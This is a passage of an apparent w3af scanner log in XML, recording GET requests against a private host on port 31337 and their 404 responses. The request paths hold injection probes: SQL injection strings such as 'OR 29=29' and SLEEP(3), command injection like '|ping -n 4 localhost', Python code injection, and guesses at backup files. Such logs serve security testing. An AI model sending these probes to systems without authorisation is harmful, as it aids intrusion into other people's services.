&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="373">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="375">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="377">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hMHnzArS HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="378">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+OR+%2229%22%3D%2229 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="379">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/dgcjv%3C%2F-%3Edgcjv%2F%2Adgcjv%22dgcjvdgcjv%27dgcjvdgcjv%60dgcjvdgcjv+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="892">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="893">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="396">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+AND+%2229%22%3D%2230 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="914">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="921">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="410">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="413">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%27+OR+%2729%27%3D%2729 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="936">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="426">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="939">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="432">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="436">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%27+AND+%2729%27%3D%2730 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="952">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="955">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="451">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29+OR+29%3D29+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="455">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
